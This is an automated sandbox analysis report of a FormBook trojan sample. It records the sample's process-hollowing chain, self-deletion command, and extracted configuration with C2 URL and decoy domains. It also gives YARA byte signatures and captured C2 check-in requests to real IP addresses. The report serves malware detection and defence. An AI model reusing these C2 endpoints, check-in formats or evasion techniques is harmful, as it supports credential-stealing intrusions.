Windows Analysis Report OApfyh3Vfm

Overview

General Information

Sample Name: OApfyh3Vfm (renamed file extension from none to exe)
Analysis ID: 495803
MD5: 015d157c73a9a51f0a3745a028d3abce
SHA1: 594e74fe551ee2e3dcb7cef570792ee2e944b166
SHA256: 4633bc441c059884886be83a8733f355d933b58db80f81c0a56404bceadf9667
Tags: 32, exe, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • OApfyh3Vfm.exe (PID: 6332 cmdline: 'C:\Users\user\Desktop\OApfyh3Vfm.exe' MD5: 015D157C73A9A51F0A3745A028D3ABCE)
    • OApfyh3Vfm.exe (PID: 2908 cmdline: C:\Users\user\Desktop\OApfyh3Vfm.exe MD5: 015D157C73A9A51F0A3745A028D3ABCE)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 4812 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 6880 cmdline: /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.anamentor.com/shjn/"], "decoy": ["trendlito.com", "myspoiledbytchcreations.com", "skinsotight.com", "merakii.art", "sakina.digital", "qumpan.com", "juxing666.com", "andrewolivercounselling.com", "blastaerobics.com", "linevshaper.store", "legendvacationrentals.com", "adna17.com", "ingodwetrustdaycare.com", "j98066.com", "noordinarybusiness.com", "pacelicensedelectrician.com", "istanbulmadencilik.com", "roboscop.com", "njhude.com", "eaglelures.com", "asmrfans.com", "wwv-kraken-apps.com", "agora.markets", "factechcolombia.com", "cadillacjacksbargrill.com", "lakearrowheadescape.com", "privatelymeeting.com", "purelol.com", "bailey-holzwerk.com", "lawsorlando.com", "zoonseo.com", "petscomfortgrooming.com", "blogreen.xyz", "modernmpm.com", "axe8.club", "majesticgolftours.com", "happyj.biz", "2ed58fwec.xyz", "moms4real.com", "craftsbylarissa.com", "ninetofivetheses.com", "giftsetswithlove.com", "artistryinahome.com", "bestofdubrovnik.info", "mediakal-sa.net", "9158cs.xyz", "sakuratyu.com", "christasconezntreats.com", "flex-aportelabels.com", "douyinliu.com", "meet-bait.com", "sumikkoremon.com", "jjscryptosignals.com", "repsychel.com", "hartfulcleaning.com", "buylandintexas.net", "xn--blogins-w1b.com", "aksene.com", "californialandscapeimages.com", "watchyellow.space", "altcultpromotions.com", "fusiongroupgames.net", "panchmitramultitrade.com", "theledgrowbook.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
    00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x16ab9:$sqlite3step: 68 34 1C 7B E1
      • 0x16bcc:$sqlite3step: 68 34 1C 7B E1
      • 0x16ae8:$sqlite3text: 68 38 2A 90 C5
      • 0x16c0d:$sqlite3text: 68 38 2A 90 C5
      • 0x16afb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
      00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

        Unpacked PEs

        Source | Rule | Description | Author | Strings
        2.2.OApfyh3Vfm.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          2.2.OApfyh3Vfm.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.OApfyh3Vfm.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x16ab9:$sqlite3step: 68 34 1C 7B E1
          • 0x16bcc:$sqlite3step: 68 34 1C 7B E1
          • 0x16ae8:$sqlite3text: 68 38 2A 90 C5
          • 0x16c0d:$sqlite3text: 68 38 2A 90 C5
          • 0x16afb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
          2.2.OApfyh3Vfm.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
            2.2.OApfyh3Vfm.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
            • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            AV Detection:

            Found malware configuration
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
            Multi AV Scanner detection for submitted file
            Source: OApfyh3Vfm.exe, Virustotal: Detection: 48%
            Source: OApfyh3Vfm.exe, Metadefender: Detection: 37%
            Source: OApfyh3Vfm.exe, ReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara match, File source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
            Source: OApfyh3Vfm.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: OApfyh3Vfm.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: netstat.pdb source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: OApfyh3Vfm.exe, 00000002.00000002.734139678.000000000131F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: OApfyh3Vfm.exe, NETSTAT.EXE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 4x nop then pop esi, 2_2_00415845
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 4x nop then pop ebx, 2_2_00406AB4
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe, Code function: 4x nop then pop esi, 2_2_00415760
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop ebx, 8_2_02FD6AB5
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi, 8_2_02FE5845
            Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop esi, 8_2_02FE5760

            Networking:

            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49815 -> 35.246.6.109:80
            Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49815 -> 35.246.6.109:80
            Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49815 -> 35.246.6.109:80
            Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49847 -> 173.231.37.12:80
            Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49847 -> 173.231.37.12:80
            Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49847 -> 173.231.37.12:80
            Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 199.59.242.153:80
            Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 199.59.242.153:80
            Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49896 -> 199.59.242.153:80
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe, Domain query: www.sakina.digital
            Source: C:\Windows\explorer.exe, Network Connect: 213.186.33.5 80
            Source: C:\Windows\explorer.exe, Domain query: www.ninetofivetheses.com
            Source: C:\Windows\explorer.exe, Domain query: www.privatelymeeting.com
            Source: C:\Windows\explorer.exe, Network Connect: 156.225.2.209 80
            Source: C:\Windows\explorer.exe, Domain query: www.agora.markets
            Source: C:\Windows\explorer.exe, Domain query: www.sakuratyu.com
            Source: C:\Windows\explorer.exe, Network Connect: 46.38.243.234 80
            Source: C:\Windows\explorer.exe, Network Connect: 35.246.6.109 80
            Source: C:\Windows\explorer.exe, Domain query: www.hartfulcleaning.com
            Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exe, Domain query: www.2ed58fwec.xyz
            Source: C:\Windows\explorer.exe, Network Connect: 81.169.145.74 80
            Source: C:\Windows\explorer.exe, Network Connect: 81.88.48.71 80
            Source: C:\Windows\explorer.exe, Domain query: www.qumpan.com
            Source: C:\Windows\explorer.exe, Domain query: www.factechcolombia.com
            Uses netstat to query active network connections and open ports
            Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Performs DNS queries to domains with low reputation
            Source: C:\Windows\explorer.exe, DNS query: www.2ed58fwec.xyz
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor, URLs: www.anamentor.com/shjn/
            Source: Joe Sandbox View, ASN Name: OVHFR OVHFR
            Source: Joe Sandbox View, ASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
            Source: global traffic, HTTP traffic detected: GET /shjn/?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3 HTTP/1.1 | Host: www.hartfulcleaning.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
            Source: global traffic, HTTP traffic detected: GET /shjn/?BZXds2=yig434buSM9mjL6sFft/wR3J8yL+W/NNnR041iD/jBfLeA0894Dqi/iq5ABxMbWmFo1f&jlW=5jIhet3 HTTP/1.1 | Host: www.qumpan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
            Source: global traffic, HTTP traffic detected: GET /shjn/?BZXds2=CnEZGgp6DBB+pDnOuIixGpXAp+VMVpLueRIhGB4QWd57GYod+SwBDNIEOLI4bN8ncwp9&jlW=5jIhet3 HTTP/1.1 | Host: www.2ed58fwec.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
            Source: global traffic, HTTP traffic detected: GET /shjn/?BZXds2=q+IOPKcWAF8HOZaSc4cEUEu5wE6+kd2dEtRaCxRabbawa99LvN+eX182jK5p9vZ8QaPu&jlW=5jIhet3 HTTP/1.1 | Host: www.factechcolombia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
            Source: global traffic, HTTP traffic detected: GET /shjn/?BZXds2=U4D/9jyl4LwInOaHPL1dM7FXipfOkLnA1xY1V+vBJ7elQfZSHChwpT42Icw9AFkuQMKq&jlW=5jIhet3 HTTP/1.1 | Host: www.sakina.digital | Connection: close | Data Raw: 00 00 00 00 00 00 00
            Source: global traffic, HTTP traffic detected: GET /shjn/?BZXds2=DRu3/33A+HP1NRfSxdp3iuQBFZZLKD7J2S+jM/VNqTCHnWN0FA+Y+jnmu1WXSKeywE4Q&jlW=5jIhet3 HTTP/1.1 | Host: www.ninetofivetheses.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
            Source: global traffic, HTTP traffic detected: GET /shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3 HTTP/1.1 | Host: www.privatelymeeting.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
            Source: Joe Sandbox View, IP Address: 213.186.33.5 213.186.33.5
            Source: global traffic, HTTP traffic detected: HTTP/1.1 301 Moved Permanently | Date: Sun, 03 Oct 2021 07:57:43 GMT | Content-Length: 0 | Connection: close | location: https://www.hartfulcleaning.com/shjn?BZXds2=sGW4EfnlOld3gMwR6nFOZ01tYWW8eRMx6o9zTejdhe9Ku3EOZ7xj3UqbOjGG9zLxzvjR&jlW=5jIhet3 | strict-transport-security: max-age=120 | x-wix-request-id: 1633247863.819246588398126726 | Age: 0 | Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 | Cache-Control: no-cache | X-Content-Type-Options: nosniff | Server: Pepyaka/1.19.10
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 03 Oct 2021 07:56:54 GMT | Server: Apache/2.4.10 (Debian) | Content-Length: 276 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.qumpan.com Port 80</address></body></html>
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 03 Oct 2021 07:58:08 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shjn/ was not found on this server.</p></body></html>
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sun, 03 Oct 2021 07:58:18 GMT | Server: Apache/2.4.49 (Unix) | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Sun, 03 Oct 2021 07:58:23 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "615764fb-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
            Source: global traffic, HTTP traffic detected: HTTP/1.1 301 Moved Permanently | server: nginx | date: Sun, 03 Oct 2021 07:58:29 GMT | content-type: text/html | content-length: 162 | location: https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3 | x-iplb-request-id: 66818F39:C2B5_D5BA2105:0050_615962A5_2A4BC799:CEDD | x-iplb-instance: 16976 | set-cookie: SERVERID77446=200172|YVliq|YVliq; path=/; HttpOnly | cache-control: private | connection: close | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
            Source: NETSTAT.EXE, 00000008.00000002.933459913.0000000003B52000.00000004.00020000.sdmp, String found in binary or memory: https://bemebee.com/shjn?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko
            Source: unknown, DNS traffic detected: queries for: www.agora.markets

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match, File source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.721050737.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.733402513.0000000000C40000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.932251998.0000000000A40000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000000.707324190.000000000E3E3000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.932766268.0000000002FD0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.733303367.0000000000C10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            .NET source code contains very large strings
            Source: OApfyh3Vfm.exe, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 1.0.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 1.2.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 2.2.OApfyh3Vfm.exe.620000.1.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: 2.0.OApfyh3Vfm.exe.620000.0.unpack, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
            Source: OApfyh3Vfm.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.OApfyh3Vfm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.OApfyh3Vfm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.932646758.0000000002ED0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
